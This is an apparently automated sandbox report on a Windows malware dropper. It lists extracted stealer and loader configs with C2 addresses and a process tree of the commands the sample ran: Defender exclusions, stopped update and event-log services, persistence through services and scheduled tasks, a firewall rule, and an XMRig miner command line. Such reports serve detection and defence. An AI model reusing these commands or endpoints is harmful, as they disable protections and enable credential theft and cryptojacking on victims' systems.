Analysis

  • max time kernel
    52s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 18:00

General

  • Target

    99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe

  • Size

    1.6MB

  • MD5

    001be162d542c660f606af631a96a943

  • SHA1

    5d9ddc2c639aa967474fff665f786fdd3b53f6eb

  • SHA256

    99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d

  • SHA512

    160285ea718dfec555990bcc43cf4e2dac3cf067cbfb00b4a77c96de5a5977f42965f14a25d6c6f1aadd5187d9e8d3916826a431b098fde61cba4064ac97ddca

  • SSDEEP

    49152:3tlPaig3iDLdwtzVrQO10UNu16fjbC+gCOeC:9lCD3iDRwvrsUNu167WVx

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.64.56

5.42.65.64

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 42 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe
    "C:\Users\Admin\AppData\Local\Temp\99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3272
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:4568
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:1188
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2320
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4104
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1140
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 332
                6⤵
                • Program crash
                PID:224
            • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1568
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:4348
              • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1836
              • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:3608
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3468
                  • C:\Windows\SysWOW64\sc.exe
                    Sc stop GameServerClient
                    7⤵
                    • Launches sc.exe
                    PID:4856
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameServerClient confirm
                    7⤵
                    • Executes dropped EXE
                    PID:3920
                  • C:\Windows\SysWOW64\sc.exe
                    Sc delete GameSyncLink
                    7⤵
                    • Launches sc.exe
                    PID:2752
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameSyncLink confirm
                    7⤵
                    • Executes dropped EXE
                    PID:4640
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1556
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService start GameSyncLink
                    7⤵
                    • Executes dropped EXE
                    PID:2288
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                  6⤵
                    PID:3876
                    • C:\Windows\SysWOW64\sc.exe
                      Sc stop GameServerClientC
                      7⤵
                      • Launches sc.exe
                      PID:3076
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameServerClientC confirm
                      7⤵
                      • Executes dropped EXE
                      PID:2296
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete PiercingNetLink
                      7⤵
                      • Launches sc.exe
                      PID:1888
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove PiercingNetLink confirm
                      7⤵
                      • Executes dropped EXE
                      PID:2388
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:4472
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start PiercingNetLink
                      7⤵
                      • Executes dropped EXE
                      PID:1660
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                    6⤵
                      PID:2832
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLinks
                        7⤵
                        • Launches sc.exe
                        PID:2040
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLinks confirm
                        7⤵
                        • Executes dropped EXE
                        PID:4732
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:4060
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLinks
                        7⤵
                        • Executes dropped EXE
                        PID:1756
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                      6⤵
                        PID:5296
                    • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5040
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        6⤵
                          PID:832
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:1156
                        • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:736
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:2412
                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:3964
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:444
                            • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:832
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 464
                                7⤵
                                • Program crash
                                PID:1224
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 488
                                7⤵
                                • Program crash
                                PID:4724
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 748
                                7⤵
                                • Program crash
                                PID:4576
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 748
                                7⤵
                                • Program crash
                                PID:4316
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 832
                                7⤵
                                • Program crash
                                PID:4636
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 852
                                7⤵
                                • Program crash
                                PID:2860
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 968
                                7⤵
                                • Program crash
                                PID:4060
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 968
                                7⤵
                                • Program crash
                                PID:3876
                            • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                              6⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              PID:1508
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 460
                                7⤵
                                • Program crash
                                PID:740
                            • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3484
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3084
                              • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                7⤵
                                  PID:2832
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    8⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:5664
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                    8⤵
                                      PID:5600
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                        9⤵
                                        • Modifies Windows Firewall
                                        PID:4280
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      8⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:5692
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      8⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:3996
                                • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4236
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:5124
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    7⤵
                                      PID:1292
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        8⤵
                                          PID:5352
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:1288
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:5432
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        7⤵
                                        • Launches sc.exe
                                        PID:5364
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        7⤵
                                        • Launches sc.exe
                                        PID:2500
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:5328
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        7⤵
                                          PID:2700
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          7⤵
                                            PID:4828
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            7⤵
                                              PID:3244
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                              7⤵
                                                PID:3140
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                7⤵
                                                • Launches sc.exe
                                                PID:4704
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                7⤵
                                                • Launches sc.exe
                                                PID:5316
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop eventlog
                                                7⤵
                                                • Launches sc.exe
                                                PID:4472
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe start "WSNKISKT"
                                                7⤵
                                                • Launches sc.exe
                                                PID:3012
                                      • C:\Users\Admin\1000006002\4cb49b2ba7.exe
                                        "C:\Users\Admin\1000006002\4cb49b2ba7.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:4832
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2320 -ip 2320
                                    1⤵
                                      PID:868
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3080
                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:868
                                        • C:\Windows\Temp\830970.exe
                                          "C:\Windows\Temp\830970.exe" --list-devices
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:2032
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:1396
                                      • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                        "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1984
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 832 -ip 832
                                      1⤵
                                        PID:4856
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 832 -ip 832
                                        1⤵
                                          PID:1756
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1508 -ip 1508
                                          1⤵
                                            PID:3304
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 832 -ip 832
                                            1⤵
                                              PID:960
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 832 -ip 832
                                              1⤵
                                                PID:2376
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 832 -ip 832
                                                1⤵
                                                  PID:984
                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                  "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:320
                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                    "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4468
                                                    • C:\Windows\Temp\850308.exe
                                                      "C:\Windows\Temp\850308.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:2040
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 832 -ip 832
                                                  1⤵
                                                    PID:3876
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 832 -ip 832
                                                    1⤵
                                                      PID:3464
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 832 -ip 832
                                                      1⤵
                                                        PID:4636
                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        1⤵
                                                          PID:5372
                                                        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          1⤵
                                                            PID:5380
                                                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                            C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                            1⤵
                                                              PID:5612
                                                            • C:\Windows\system32\dwm.exe
                                                              "dwm.exe"
                                                              1⤵
                                                                PID:5788
                                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                1⤵
                                                                  PID:3100
                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                    2⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:2668
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                    2⤵
                                                                      PID:4224
                                                                      • C:\Windows\system32\wusa.exe
                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                        3⤵
                                                                          PID:2356
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:4384
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:6044
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:1068
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop bits
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:3596
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                        2⤵
                                                                        • Launches sc.exe
                                                                        PID:2232
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        2⤵
                                                                          PID:5216
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          2⤵
                                                                            PID:2700
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                            2⤵
                                                                              PID:3200
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              2⤵
                                                                                PID:3864
                                                                              • C:\Windows\system32\conhost.exe
                                                                                C:\Windows\system32\conhost.exe
                                                                                2⤵
                                                                                  PID:5224
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                    3⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:1492
                                                                                • C:\Windows\explorer.exe
                                                                                  explorer.exe
                                                                                  2⤵
                                                                                    PID:464
                                                                                • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                  1⤵
                                                                                    PID:3984
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    1⤵
                                                                                      PID:712

                                                                                    Network

                                                                                    • flag-us
                                                                                      DNS
                                                                                      g.bing.com
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      g.bing.com
                                                                                      IN A
                                                                                      Response
                                                                                      g.bing.com
                                                                                      IN CNAME
                                                                                      g-bing-com.dual-a-0034.a-msedge.net
                                                                                      g-bing-com.dual-a-0034.a-msedge.net
                                                                                      IN CNAME
                                                                                      dual-a-0034.a-msedge.net
                                                                                      dual-a-0034.a-msedge.net
                                                                                      IN A
                                                                                      204.79.197.237
                                                                                      dual-a-0034.a-msedge.net
                                                                                      IN A
                                                                                      13.107.21.237
                                                                                    • flag-us
                                                                                      GET
